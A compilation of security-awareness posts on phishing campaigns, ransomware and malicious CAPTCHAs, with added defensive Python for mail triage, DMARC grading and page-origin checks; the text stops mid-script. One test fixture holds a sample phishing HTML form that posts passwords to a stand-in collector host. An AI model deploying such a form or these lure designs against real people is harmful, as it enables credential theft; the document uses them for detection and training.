Phishing Targets Industrial Control Systems

Phishing continues to be a primary initial access vector in cyberattacks against industrial control systems, according to researchers at Dragos. Out of the fifteen threat groups tracked by the security firm, ten rely on spear phishing attachments to compromise their victims, and thirteen abuse valid accounts to maintain persistence.

STIBNITE, a threat actor that targets wind turbine companies in Azerbaijan, uses fake login pages and malware-laden documents to compromise its victims.

“STIBNITE gains initial access via credential theft websites spoofing Azerbaijan government organizations and phishing campaigns using variants of malicious Microsoft Office documents,” Dragos says. “STIBNITE also used information related to the global COVID-19 pandemic for malicious document themes.”

TALONITE, a threat group that focuses on the US electric sector, uses spear phishing to deliver malicious documents.

“TALONITE’s phishing campaigns utilize electric and power grid engineering-specific themes and concepts, indicating an intent to gain a foothold within energy sector entities,” the researchers write. “Such access could facilitate gathering host and identity information, collecting sensitive operational data, or mapping the enterprise environment to identify points of contact with ICS. The identified infrastructure and phishing emails spoofed the National Council of Examiners for Engineering and Surveying (NCEES), North American Electric Reliability Corporation (NERC), the American Society of Civil Engineers (ASCE), and Global Energy Certification (GEC).”

Dragos stresses that malicious cyber activity targeting industrial control systems is increasing, with four new ICS-targeting threat actors spotted in 2020.

“Data from our YIR report shows that this trend corresponds with a 3X rise in ICS-focused threats,” said Dragos’ CEO, Robert M. Lee. “The convergence of an increasingly ICS-aware and capable threat landscape with the trend towards more network connectivity means that the practical observations and lessons learned contained in our 2020 YIR report are timely as the community continues to work to provide safe and reliable operations.”

New-school security awareness training can give your organization an essential layer of defense by enabling your employees to thwart targeted phishing attacks.


Bogus FedEx and DHL Phishbait

Researchers at Armorblox describe an ongoing phishing campaign that’s using phony FedEx and DHL shipping notifications as phishing lures.

“A few days ago, the Armorblox threat research team observed an email impersonating FedEx attempt to hit one of our customer environments,” the researchers write. “The email was titled ‘You have a new FedEx sent to you’ followed by the date the email was sent. The email contained some information about the document to make it seem legitimate, along with links to view the supposed document.”

The emails contained links to the Quip document hosting service, where the attackers had set up a landing page with a link to a spoofed Office 365 login page. The DHL phishing scam used a similar technique.

“The email sender name was ‘Dhl Express’ and title was ‘Your parcel has arrived’, including the victim’s email address at the end of the title,” Armorblox says. “The email informed victims that a parcel arrived for them at the post office, and that the parcel couldn’t be delivered due to incorrect delivery details. The email includes attached shipping documents that victims are guided to check if they want to receive their delivery.”

These emails contained an HTML attachment that opened what appeared to be a blurred-out spreadsheet behind an Adobe login box. The login overlay had the user’s email address pre-filled in the first box, so the researchers believe the attackers were trying to trick the user into entering their email password rather than their Adobe account credentials.

The researchers conclude that people should use a combination of training and technical defenses such as two-factor authentication to defend themselves against these attacks.

“Since we get so many emails from service providers, our brains have been trained to quickly execute on their requested actions,” they write. “It’s much easier said than done, but engage with these emails in a rational and methodical manner whenever possible. Subject the email to an eye test that includes inspecting the sender name, sender email address, language within the email, and any logical inconsistencies within the email (e.g. Why is the email sender name ‘Dhl Express’ instead of ‘DHL Express’, Why does this shipping details document have an HTML extension? etc.).”

What might users be trained to look for? Poor idiomatic control, for one thing. The logos and layouts are very nicely done, but the words are a bit clumsier: DHL and FedEx have better writers. New-school security awareness training can create a culture of security within your organization so your employees can recognize phishing and other types of social engineering attacks.
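The DHL lure above combines three things a mail gateway can look for without any brand knowledge: an HTML attachment, a password field inside it, and the recipient’s own address pre-filled in the form. The following is an added example (not Armorblox’s code) that parses a constructed message with the standard library and reports those indicators; the sender, recipient and collector host are made up.

```python
"""Triage an e-mail for the HTML-attachment credential-harvest pattern:
an .html attachment that renders a login overlay with the recipient's
address pre-filled. Added example; the sample message is constructed."""
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample: a DHL-themed message carrying an HTML "shipping document".
SAMPLE_EML = """\
From: Dhl Express <notify@example.net>
To: alice@example.com
Subject: Your parcel has arrived alice@example.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your parcel could not be delivered due to incorrect delivery details.
Please check the attached shipping document.

--b1
Content-Type: text/html; name="Shipping_Document.html"
Content-Disposition: attachment; filename="Shipping_Document.html"

<html><body style="filter: blur(4px)">
<div class="overlay">
<form action="https://collector.example.org/post" method="post">
<input type="email" name="user" value="alice@example.com">
<input type="password" name="pass">
<input type="submit" value="Sign in with Adobe ID">
</form></div></body></html>
--b1--
"""


class FormScanner(HTMLParser):
    """Collect form targets, password fields and pre-filled e-mail values."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_fields, self.prefilled = [], 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.password_fields += 1
            if "@" in (a.get("value") or ""):
                self.prefilled.append(a["value"])


def scan_message(raw):
    """Return one indicator dict per HTML attachment found in the message."""
    msg = email.message_from_string(raw, policy=policy.default)
    recipients = {a.addr_spec.lower() for a in msg["To"].addresses} if msg["To"] else set()
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() != "text/html" and not name.endswith((".htm", ".html")):
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        findings.append({
            "filename": name,
            "password_fields": scanner.password_fields,
            "form_targets": scanner.actions,
            # The recipient's own address baked into the form is the tell the
            # researchers pointed at: the attacker wants the mailbox password.
            "recipient_prefilled": any(v.lower() in recipients for v in scanner.prefilled),
        })
    return findings


def is_suspicious(findings):
    """A password field that posts somewhere, or that knows who you are, is enough to hold the mail."""
    return any(f["password_fields"] and (f["form_targets"] or f["recipient_prefilled"]) for f in findings)


if __name__ == "__main__":
    hits = scan_message(SAMPLE_EML)
    print(hits, "SUSPICIOUS" if is_suspicious(hits) else "clean")
```

A real gateway would also detonate the attachment in a browser, since the form and its target are often assembled by script rather than present in the static markup; the static check above is the cheap first pass.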


Running Headfirst Into a Breach

The pandemic changed the fortunes of many organisations. Perhaps none so much as Zoom, which has found itself becoming a noun synonymous with any form of video call.

However, its meteoric rise has not been without some hiccups along the way. There have been many cases of people not securing their meetings, leading to many cases of ‘zoombombing’ in which unauthorised people join video calls with the intention of sharing lewd, obscene or otherwise distasteful content.

There was also the case of investors wanting to jump on the Zoom bandwagon who inadvertently purchased stock of Zoom Technologies, a small Chinese company which had nothing to do with Zoom, the video chat platform.

Errors and mistakes aside, criminals have also been quick to notice the trend and have been quick to capitalise by registering thousands of fake domains designed to impersonate Zoom and other video conference brands. They have also been using them to send out phishing links.

With the majority of office employees working remotely, receiving Zoom invites or even seeing reminders in their calendar for upcoming Zoom meetings has become a daily occurrence.

It is not just phishing via email that has taken off. People working from home usually have several communication channels they use to interact with colleagues, customers, partners and friends. These encompass everything from messaging apps to social media and everything in between.

Pulling on Emotions

Criminals are very good at crafting messages in a way that pulls on people’s emotions: fear, greed, curiosity, urgency, helpfulness or any other. One of the biggest reasons this works is explained by Daniel Kahneman, who wrote in his book “Thinking, Fast and Slow” that the human brain essentially undertakes two types of thinking.

System one is referred to as fast thinking and largely works automatically and effortlessly via shortcuts, impulses and intuition. It is fast, but also error prone. System two is also known as slow thinking. It takes time to analyse, reason, solve complex problems and requires people to exercise self-control. It is slow, but reliable.

A good criminal pulls on emotions because it is a surefire way to get people into system one thinking, where they will carry out an action before thinking about it.

Think about it. When was the last time you received a scam or phishing attack and the sender was polite and ended with, “please respond whenever is convenient, there’s no rush”?

It’s why an inflammatory Tweet or Facebook post receives so much attention and so many responses, even though we often know we should just ignore it. It just presses our emotional buttons and we need to say something.

So, it becomes difficult to rein people in — even the most security conscious people can be fooled by a WhatsApp message which pops up saying, “Why aren’t you in the meeting? We’re all waiting for you. Click here to join.”

Not a Theoretical Risk

The security industry has been guilty in the past of over-hyping issues. But social engineering threats are very real. If we look at the growth of ransomware over the years, it has become a huge criminal cash cow.

Most ransomware these days is delivered via phishing across multiple channels, hitting organisations across all industry verticals and of all sizes. Nearly a year ago, Travelex was hit by ransomware which resulted in the business being down for several weeks before they recovered. Unfortunately, its woes didn’t end there. With the pandemic hitting and many countries going into lockdown, the organisation didn’t get a chance to recover and went into administration later in the year.

Down under in Australia, the CEO of a hedge fund was tricked into clicking on a phishing email disguised as a Zoom invite. The click gave criminals access to the CEO’s email, which allowed them to send emails posing as the CEO authorising payments amounting to nearly $8m. And while the hedge fund was able to recover most of the money, the reputational damage was so severe that its largest client withdrew, forcing the hedge fund to shut down.

The fact of the matter is that social engineering attacks are increasing, are becoming the main thrust of cybercrime, and are having a far greater impact on victim organisations.

Ways You Can Stay Safe

Staying safe against these attacks is increasingly difficult, not just because of the increased sophistication of attacks, but because of the sheer volume of attack avenues available to criminals, ranging from email inboxes, social media accounts and chat apps to SMS and phone calls.

  1. Security Awareness Training

    Security awareness training should be delivered to all users, from the most junior all the way to the most senior executives. The variety and impact of these attacks should be explained and mechanisms provided so that users can quickly and easily report any suspicious activity for the security team to investigate.

  2. Gain Visibility

    Security teams need to be able to obtain visibility into all of their organisation’s communication channels. For most organisations, too many channels are kept in the dark, so often by the time a breach is detected, it is too late.

  3. Real-Time Threat Detection

    All critical accounts, including marketing and executives, need to be monitored continuously for suspicious activity and messaging. In addition to scanning all files, attachments and links for malware, non-technical social engineering threats should also be sought out.

  4. Incident Response

    A layered response approach needs to be put in place so that any threats detected can be removed immediately.


The First Documented Russian Hack in…1981?

I’m reading “Active Measures: The Secret History of Disinformation and Political Warfare” by Thomas Rid and wanted to share this story with you which was new to me! It’s warmly recommended, a great read.

In October 1981, in a highly embarrassing incident for the Kremlin, a Soviet nuclear-armed submarine ran aground near Sweden’s Karlskrona Naval Base, violating Swedish territorial waters.

To deflect some of the political heat, Soviet intelligence launched an innovative active measures campaign that took advantage of a new semi-electronic messaging system, the Mailgram, an invention of Western Union.

All of a sudden, on November 8, 1981, a dozen Mailgrams started appearing across Washington, offering dirt on Swedish-American relations. They were sent to the Swedish Ambassador and several newspapers in the United States and Europe.

How was this hack possible?

A sender could phone in a message to Western Union, and they would transmit it electronically to a post office close to the recipient where the message would be printed out and delivered by mail.

Western Union did not independently confirm the recipient’s address or the telephone number to which the unauthenticated caller asked to bill the charges. “Obviously,” concluded the FBI, “the true senders of the Mailgrams were aware that they could have the charges billed to the addresses or telephone numbers of the alleged senders without verification.” The setup was easy to exploit: the attackers spoofed the senders and had Western Union send the bill to the people they were impersonating.

My realization was that Russia has been at this for a very, very long time, and with the advent of the internet they have the ultimate tool to scale their active measures and cause massive international havoc.


U.K. Phishing Attack Targets Those Seeking the COVID-19 Vaccine

This latest phishing scam impersonates the UK’s National Health Service, telling recipients that they are eligible for the vaccine in order to collect valuable banking and credit card details.

I really despise these scammers. At a time when people are searching for a way to protect themselves, these lowlifes of the cybercriminal world prey on those in fear. This latest scam has recently hit the UK where unsuspecting victims were sent an official-looking email purporting to be from the UK government with a simple message – that the recipient has been selected for the vaccine.

Would-be victims who click the “Accept Invitation” link are taken to a legitimate-looking website that appears to be the NHS:

[Image: phishing landing page impersonating the NHS]

Source: Bleeping Computer

Once victims again choose to accept the invitation, they are prompted to answer a series of questions that collect personal details including the victim’s name, their mother’s maiden name, address, and mobile number, as well as credit card and banking details.

While this scam feels like it targets individuals, the very same scam works inside your organization; all it takes is a little spin on the theming (e.g., make the email come from the HR department about a company-wide vaccination, with a link to the rollout schedule that happens to collect Office 365 credentials) to make it business-worthy.

Organizations need to take seriously attacks that appear aimed at individuals rather than corporations, because turning a campaign like the one above into one that steals corporate data requires only a few changes in how it is executed.

Putting users through Security Awareness Training is an effective way to help them protect themselves and the organization, regardless of how well-executed a phishing campaign is.


Popular Car Company Becomes Next Target in $20 Million Dollar Ransomware Attack

Popular car company Kia Motors America recently made headlines over a possible ransomware attack in which a cybercriminal gang demanded a $20 million ransom in return for not leaking stolen data.

Bleeping Computer reported earlier this week that the car company suffered a major IT outage affecting all of its technology applications. A customer tweeted that a dealership had told them the outage was due to a ransomware attack.

The group allegedly responsible is DoppelPaymer, a well-known ransomware gang that steals unencrypted files before encrypting the victim’s devices and then leaks the stolen data on a site to further pressure the victim into paying. Below is a recent example of just that:

[Image: DoppelPaymer leak-site listing]

Source: Bleeping Computer

Kia Motors America released a statement with the following, “KMA is aware of IT outages involving internal, dealer and customer-facing systems, including UVO. We apologize for any inconvenience to our customers and are working to resolve the issue and restore normal business operations as quickly as possible.”

Make sure your organization is not the next victim of ransomware. New-school security awareness training can teach your users how to spot and report any suspicious activity.


Bogus Bug Reports as Phishbait, Scams

Some bug bounty seekers are using extortionist or fear-mongering tactics in an effort to get paid for reporting trivial flaws, according to Chester Wisniewski at Sophos. He calls them “beg bounty” attempts. Wisniewski explains that, “‘Beg bounty’ queries run the gamut from honest, ethical disclosures that share all the needed information and hint that it might be nice if you were to send them a reward, to borderline extortion demanding payment without even providing enough information to determine the validity of the demand.”

For example, some of these individuals use automated scanners to identify websites that don’t have DMARC enabled, then send a copy-and-pasted notification to each website’s owner.

“They claim to have found a ‘vulnerability in your website’ and then go on to explain that you do not have a DMARC record for protection against email spoofing,” Wisniewski writes. “That is neither a vulnerability nor is it in your website. While publication of DMARC records can help prevent phishing attacks, it is not an easy policy to deploy, nor is it high on the list of security tasks for most organizations.”
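The DMARC point is worth making concrete. A beg-bounty scanner only checks whether a `_dmarc` TXT record exists; whether the record actually limits spoofing depends on what it says. The following is an added example, not Sophos’ code, that parses a DMARC record and grades it. The records are constructed, and the `rua`/`sp`/`pct` interpretation follows the DMARC specification’s tag meanings.

```python
"""Parse and grade a DMARC TXT record offline. Added example; the records
in RECORDS are constructed for illustration."""


def parse_dmarc(txt):
    """Turn 'v=DMARC1; p=none; rua=...' into a dict of lower-cased tags."""
    tags = {}
    for field in txt.split(";"):
        if "=" in field:
            k, _, v = field.strip().partition("=")
            tags[k.strip().lower()] = v.strip()
    return tags


def assess_dmarc(txt):
    """Return (grade, reasons); grade is 'missing', 'monitor', 'partial' or 'enforced'."""
    if not txt:
        return "missing", ["no DMARC record published"]
    tags = parse_dmarc(txt)
    if tags.get("v", "").upper() != "DMARC1":
        return "missing", ["record is not a valid DMARC record"]
    policy = tags.get("p", "none").lower()
    pct = int(tags.get("pct", "100"))      # share of failing mail the policy applies to
    reasons = []
    if policy == "none":
        reasons.append("p=none: receivers are asked only to report, not to reject")
        grade = "monitor"
    elif pct < 100:
        reasons.append(f"pct={pct}: policy applies to only {pct}% of failing mail")
        grade = "partial"
    else:
        grade = "enforced"
    if "rua" not in tags:
        reasons.append("no rua= address: aggregate reports are not being collected")
    if tags.get("sp", "").lower() == "none" and policy != "none":
        reasons.append("sp=none: subdomains are left unprotected")
    return grade, reasons


# Constructed records: the "we have DMARC" cases a scanner treats as equal.
RECORDS = {
    "example.com": "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
    "example.net": "v=DMARC1; p=quarantine; pct=25; rua=mailto:dmarc@example.net",
    "example.org": "v=DMARC1; p=reject; sp=none",
    "example.edu": "",
}

if __name__ == "__main__":
    for domain, record in RECORDS.items():
        grade, reasons = assess_dmarc(record)
        print(f"{domain}: {grade}", *reasons, sep="\n  ")
```

To grade a live domain, feed it the TXT record returned by `dig TXT _dmarc.<domain>`; the script deliberately does no DNS itself so it runs offline. Note that `p=none` is the normal starting point of a careful rollout, which is exactly why “you have no DMARC” and “you have DMARC” say little on their own.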

While some of these people are probably well-meaning, others are clearly scammers seeking to frighten victims into paying. Even in the cases where real vulnerabilities were identified, the flaws were minor and not worthy of a bounty payout. Additionally, many of the targeted organizations didn’t have bug bounty programs set up in the first place. Wisniewski thinks small businesses are most at risk of falling for these tactics.

“There are reports that paying beg bounties leads to escalating demands for higher payments,” Wisniewski says. “One organization apparently said it started out at $500 and then, as further bugs were reported, the senders quickly demanded $5,000 and were more threatening.”

If you do have a bug bounty program, you’ll know about it. And if you don’t, let your people know that, too, so they don’t fall victim to this…what? Grey hat scam? Not all scams come in black and white. New-school security awareness training can help your employees remain calm and avoid falling victim to scare tactics and other social engineering techniques.


Caught by a CAPTCHA?

Be aware that you could be tricked into solving CAPTCHAs for criminals.

I do not know anyone who loves CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart). These are little online tests that supposedly tease out whether the action being performed is being done by a human or some automated bot program or script. They are needed because miscreants across the Internet would otherwise abuse the involved services to create bogus accounts used to hack others or simply abuse the system in some other way. CAPTCHAs are an unfortunate, but necessary part of life (at least right now). We are forced to interact with them when we are newly registering on websites or performing a potentially risky action.

CAPTCHA Examples

There are many different types of CAPTCHAs, ranging from extremely easy to solve to ones that require more effort and are more prone to human error. In their easiest form, they are simply a box (see example below) that we are told to click.

[Image: the “I’m not a robot” checkbox]

And all we do is click the box to prove we are not a bot, resulting in the image we all see below.

[Image: the checkbox after it has been ticked]

Some of the CAPTCHA tests ask us to type out characters we see that have been exaggerated and changed in some way that humans can supposedly still make them out, but an automated optical character recognition (OCR) program could not. See example below.

[Image: distorted-text CAPTCHA]

I am sure many of us really hate those sorts of tests because it can be tough for anyone to figure out what the characters or words are at times. I have even hit the ‘Send a new word’ button before and had to cycle through a few new offers before I could find one that I could figure out 100%.

Some CAPTCHAs (like the one below), used by TikTok, simply ask you to pick out two similar objects.

[Image: TikTok CAPTCHA asking the user to pick two similar objects]

The most complicated ones are the ones that ask you to “Click on all the squares…” that contain traffic lights, cars, traffic signs, or some other supposedly common image (like the image below).

[Image: Google reCAPTCHA image-grid challenge]

The problem with these types is that many times, the blocks will contain a very tiny piece of the required object, often looking almost accidental or microscopic, and you’re not sure if it should be selected or not. Forget frustrating bots, CAPTCHAs frustrate humans.

If you want a seriously funny video that pokes fun at the trials and tribulations of CAPTCHAs, watch this video here.

CAPTCHA Tricks

The reason CAPTCHAs are not going away is that they work. They significantly defeat automated bots and scripts. There have been many attempts by hackers to automate answering CAPTCHAs in bulk, using machine learning, OCR and other artificial-intelligence-like tools. None of them work as well as a human.

So, hackers simply outsourced CAPTCHA solving to human beings. The bots still do the registering: rather than loading the website’s normal pages as a user would, the attackers write programs that talk to the site or its application programming interface (API) directly, skip the human-readable parts, and fill in the required account registration fields as fast as possible. Only when the CAPTCHA challenge appears does the bot hand that one piece off to real humans paid by the hackers to solve one puzzle after the next.

Somewhere in the world are teams of sweatshop workers solving CAPTCHAs, one after the other, as fast as they can. They make only a tiny amount per solved CAPTCHA, but if they can solve hundreds to thousands in a day, they can make a few dollars, or a decent living for their skill set in their part of the world. I know of skilled IT workers who bought their less skilled parents a computer, set it up in their house, and their mom and dad solve CAPTCHAs to supplement their normal income. It’s not ethical, but in many parts of the world, it’s the way a part of the population makes their money.

Websites using CAPTCHAs know that hackers hire teams of sweatshop workers to solve them, so they fight back in many ways, including tracking the IP addresses from which CAPTCHAs are solved. If too many CAPTCHAs are solved from one IP address, they cut that address off and no longer accept solutions from it. Hackers responded by rotating the IP addresses they use so they do not get “burned”, but it significantly slowed down illegal CAPTCHA solving.
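The per-IP cut-off described above is a sliding-window counter with a permanent block list. The following is an added example of that control, not any CAPTCHA vendor’s code; the solve-event log and the threshold (20 solves per 60 seconds) are constructed for illustration.

```python
"""Per-IP throttle for accepted CAPTCHA solutions. Added example; the
event log in EVENTS is constructed."""
from collections import defaultdict, deque


class SolveThrottle:
    """Sliding-window counter: an IP that submits more than max_solves
    accepted solutions within window_seconds is cut off for good."""

    def __init__(self, max_solves, window_seconds):
        self.max_solves = max_solves
        self.window = window_seconds
        self.recent = defaultdict(deque)   # ip -> timestamps of accepted solves
        self.burned = set()

    def record(self, ip, ts):
        """Return True if the solution is accepted, False if the IP is blocked."""
        if ip in self.burned:
            return False
        q = self.recent[ip]
        while q and ts - q[0] >= self.window:  # drop solves that left the window
            q.popleft()
        if len(q) >= self.max_solves:
            self.burned.add(ip)                # "burn" the address
            return False
        q.append(ts)
        return True


def replay(log_lines, max_solves=20, window_seconds=60):
    """Feed '<unix_ts> <ip>' lines through the throttle in time order.
    Returns (burned_ips, rejected_count)."""
    throttle = SolveThrottle(max_solves, window_seconds)
    rejected = 0
    for line in sorted(log_lines, key=lambda l: int(l.split()[0])):
        ts, ip = line.split()
        if not throttle.record(ip, int(ts)):
            rejected += 1
    return throttle.burned, rejected


# Constructed log: a solver farm at 198.51.100.7 submitting every 2 s, and an
# ordinary visitor at 203.0.113.5 solving twice in five minutes.
EVENTS = [f"{1000 + 2 * i} 198.51.100.7" for i in range(30)] + \
         ["1010 203.0.113.5", "1300 203.0.113.5"]

if __name__ == "__main__":
    burned, rejected = replay(EVENTS)
    print("burned:", burned, "rejected:", rejected)
```

The farm is burned on its 21st solve inside the window and its remaining nine submissions are refused, while the ordinary visitor is never touched. As the text notes, rotating source addresses defeats a pure per-IP threshold, which is why deployed systems combine it with other signals rather than relying on it alone.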

Frustrated hackers responded by sending CAPTCHAs to be solved to millions of innocent people across the Internet, each with their own individual IP address. The criminals compromise innocent websites around the Internet, and instead of inserting malicious JavaScript that tries to install malware or phish login credentials, they insert JavaScript that displays a CAPTCHA, which they hope the hapless visitor will solve on their behalf.

It was just such an attempt that I saw today that inspired this blog. I went to a popular news website that I visit every day, several times a day, and all of a sudden on that website, I saw a CAPTCHA pop-up that told me I had to solve it (just one of the simple click-here types). I shook my head, thought, “What’s this?” and was just about to click it when I realized that it was probably a malicious CAPTCHA redirect. I examined the proposed CAPTCHA. It looked as normal as any CAPTCHA I had ever seen before. I would have taken a picture for this column, but it looked like any other CAPTCHA I had ever seen before…no clues of its maliciousness. It was just a CAPTCHA on a website that does not require registration and had never before asked me to fill out a CAPTCHA.

I hit the refresh button and the malicious JavaScript CAPTCHA disappeared and the regular website came up. I downloaded all the website code to see if I could figure out where the malicious JavaScript was, but my browser refresh had brought up a new instance of the website without the malicious CAPTCHA. My “evidence” was gone. More importantly, the website I was on was not asking me to complete a CAPTCHA, proof that the one shown to me was a malicious redirect. I notified the website’s developers about the issue, but haven’t even received an automated reply.

I am not sure where the malicious CAPTCHA redirect came from. The average popular website has 50 to 150 different elements that make up the website page we see and most of those elements are from third-party sites and services, and not from the domain name you went to. Maybe the malicious JavaScript came through on a banner ad. Maybe it came through on a borrowed JavaScript element. Somewhere on that web page was a compromised element that ended up, at least for that one instance, displaying a malicious CAPTCHA redirect.
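When a page you trust suddenly shows an element it never had, the first question is which of those 50 to 150 components delivered it. The following is an added example (not code from the original post) that inventories the third-party hosts a saved page loads from and flags any that are not on the site owner’s expected list; the page markup, host names and allowlist are constructed.

```python
"""Inventory the third-party origins a page pulls in. Added example; the
page HTML and allowlist below are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag -> attribute that names a remote resource.
SRC_ATTRS = {"script": "src", "iframe": "src", "img": "src",
             "link": "href", "embed": "src", "object": "data"}


class OriginCollector(HTMLParser):
    """Group every externally sourced element by the host it loads from."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.origins = {}  # host -> [(tag, url), ...]

    def handle_starttag(self, tag, attrs):
        attr = SRC_ATTRS.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if not url:
            return
        host = urlsplit(url).netloc.lower()    # also handles //host/path
        if not host or host == self.page_host:
            return                              # relative or first-party
        self.origins.setdefault(host, []).append((tag, url))


def third_party_origins(html, page_host):
    """Map of external host -> elements loaded from it."""
    c = OriginCollector(page_host)
    c.feed(html)
    return c.origins


def unexpected_origins(html, page_host, allowlist):
    """Hosts the page loads from that the site owner did not expect."""
    return sorted(h for h in third_party_origins(html, page_host) if h not in allowlist)


# Constructed page: first-party assets, an ad tag, fonts, and two hosts the
# site owner never approved, one of which serves a "challenge" iframe.
PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.news.example/lib.js"></script>
<script src="//ads.example.net/tag.js"></script>
<link rel="stylesheet" href="https://fonts.example.org/font.css">
</head><body>
<img src="https://img.news.example/logo.png">
<iframe src="https://captcha-verify.example.com/challenge"></iframe>
<script src="https://static.example.com/analytics.js"></script>
</body></html>"""

ALLOWLIST = {"cdn.news.example", "img.news.example", "fonts.example.org"}

if __name__ == "__main__":
    for host, uses in third_party_origins(PAGE, "news.example").items():
        print(host, uses)
    print("unexpected:", unexpected_origins(PAGE, "news.example", ALLOWLIST))
```

This only sees what is in the static markup; an ad slot or a tag manager that injects elements at runtime will not show up, which is why the author’s refresh lost the evidence. Capture the browser’s network log (a HAR export) while the rogue element is on screen, and run the same comparison against the hosts it actually contacted. Site owners can get the same inventory continuously with a `Content-Security-Policy-Report-Only` header that reports loads from hosts outside the allowlist.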

Why You Should Care About Malicious CAPTCHAs

Now in the grand scheme of things, malicious CAPTCHA redirects are very low risk to the end user. As far as I know, they cannot be used to silently install malware on a user’s device or to redirect them to a malicious web page. In that way, they are a bit like adware malware – more of a pest than outright dangerous.

But like adware, a malicious CAPTCHA can be a stand-in for how something far more malicious is presented to us or our end users, and if they don’t recognise it and click, it can lead somewhere far worse. Whatever hole or trick let the adware or the CAPTCHA redirect reach an end user could just as easily have delivered something far more dangerous. The presence of adware on a computer means a backdoor trojan or ransomware program could have used the same hole. If a user ONLY has adware, they are just lucky; it could have been far worse. And if they do not figure out how the adware got onto the computer, worse things could easily happen next time. Luck runs out.

The same is true with malicious CAPTCHA redirects. At the very least, none of us want to be involved in solving CAPTCHA puzzles for hackers so they can automate malicious account creation and do worldwide malicious things. But it is also a teachable moment for end users. All users should be aware that potentially dangerous elements could be presented to them that they need to evaluate and handle properly, even if they go to what they think is a “safe” web page.

Educate your end users to be aware of possible dangerous website elements that get inserted into their favorite, legitimate websites; and how to recognize and respond. New-school security awareness training is all about making people aware of what can be done, what it looks like, and how to treat issues. Let your end users know about potential malicious CAPTCHA redirects, because if they can recognize and avoid those, they are going to be ahead of the game with the more malicious web elements.


Phishing and Impersonated Brands

Microsoft is still the most impersonated brand for phishing campaigns, according to researchers at Vade Secure. The security firm spotted 30,621 unique Microsoft-related phishing URLs in 2020. The researchers note that “[a] single unique phishing URL could be used in hundreds or even thousands of phishing emails.” Facebook was the second most impersonated, with 14,876 unique phishing URLs. PayPal came in third, followed by Chase and eBay.

“COVID-19 colored everything in 2020, so it’s not surprising that cloud came out on top,” the researchers write. “As the working world switched to remote, the need for cloud-based solutions skyrocketed. Microsoft Teams users increased from 44 million in March 2020 to 75 million in April 2020. Meanwhile, Facebook, Google, and Netflix saw big financial gains during COVID-19, and each is in the top 20.”

E-commerce phishing has also been on the rise due to the pandemic, and some new brands have made it to the top ten list.

“New to the Phishers’ Favorites list, Rakuten, a Japanese e-commerce company, made its first appearance on the list, coming in at #6,” the researchers write. “Rakuten’s rise is thanks to a large spike in phishing activity in Q3 2020, when Vade Secure detected a 485 percent increase in Rakuten phishing URLs.”

The researchers also observed a year-over-year increase in phishing emails laden with the Emotet banking Trojan.

“Phishing emails weaponized with malware also featured prominently in 2020,” Vade Secure says. “Emotet, which had gone silent in early 2020, returned briefly in the spring and came roaring back in the fall. A wave of Emotet malware emails hit Microsoft users in September, with a single-day high of 1,799 phishing URLs and 13,617 for the quarter, a 44 percent increase from Q2.”

Trends in phishing lures change over time, but the underlying hallmarks of social engineering remain the same. New-school security awareness training can help your employees recognize phishing emails and other social engineering attacks.


New Phishing Scam Uses Fake PPP Loans to Trick Victims into Giving Up Personal Information

Taking advantage of people’s need for financial assistance, these scammers pose as a bank offering “forgivable business loans to individuals impacted by the pandemic.”

Nothing says low life more than someone who purposely targets those who are already down and out. Those responsible for a new scam identified by the security researchers at Abnormal Security are the lowest of the low – running a scam essentially promising free money to those that are in need.

In this scam, thousands of potential victims were sent an email impersonating an SBA Lender “World Trade Finance” informing the recipient that the Paycheck Protection Program has been extended and they are now taking applications for new forgivable loans.

Those interested click a link that takes them to a genuine Office 365 form, which lends the page legitimacy:

[Image: the Office 365 form used to collect applicants’ details]

Victims are asked for every piece of personal information including name, birthdate, and social security number – along with other business details to make the form seem legitimate.

There were some telltale signs that this was a scam to begin with:

  • The email is sent to ‘payments@sba.pppgov.com’, a domain obviously not associated with the government.
  • It appears the actual recipient must have been blind cc’d
  • The link goes to an Office 365 form and not something embedded in the business’ actual website
  • While there is a ‘World Trade Finance’ that is an SBA lender, a quick lookup of the lender and a comparison with the address provided in the email would reveal a mismatch.
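Three of the telltale signs above (the recipient not appearing in the To: header, a sender domain that borrows the lender’s or the government’s name without being under it, and an application form hosted on a generic form service rather than the lender’s own site) can be checked mechanically. The following is an added example, not Abnormal Security’s code, run against a constructed message; the lender name, sender domain and form URL are made up, and `sba.gov` is used only as the domain the lure is trading on.

```python
"""Header and link triage for the PPP-lender lure. Added example; the
message in SAMPLE_EML is constructed."""
import email
import re
from email import policy
from urllib.parse import urlsplit

# Form hosts anyone can use; a lender would not run its application here.
GENERIC_FORM_HOSTS = {"forms.office.com", "docs.google.com"}

SAMPLE_EML = """\
From: Example Trade Finance <loans@sba.pppgov.com>
To: payments@sba.pppgov.com
Subject: PPP extended: now accepting forgivable loan applications
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<p>The Paycheck Protection Program has been extended and we are now
taking applications for new forgivable loans.</p>
<p><a href="https://forms.office.com/r/constructedFormId">Apply now</a></p>
"""


def domain_relation(domain, legit):
    """'legit' if under the real domain, 'lookalike' if it borrows one of its
    labels (ignoring the TLD), otherwise 'unrelated'."""
    domain, legit = domain.lower(), legit.lower()
    if domain == legit or domain.endswith("." + legit):
        return "legit"
    if set(domain.split(".")[:-1]) & set(legit.split(".")[:-1]):
        return "lookalike"
    return "unrelated"


def triage(raw, delivered_to, legit_domain):
    """Return a list of human-readable flags for the message."""
    msg = email.message_from_string(raw, policy=policy.default)
    flags = []

    # 1. Bulk send: the mailbox that received this is not in To: at all.
    to_addrs = {a.addr_spec.lower() for a in msg["To"].addresses} if msg["To"] else set()
    if delivered_to.lower() not in to_addrs:
        flags.append("bcc: delivered-to address absent from To: header")

    # 2. Sender domain versus the organisation the mail claims to speak for.
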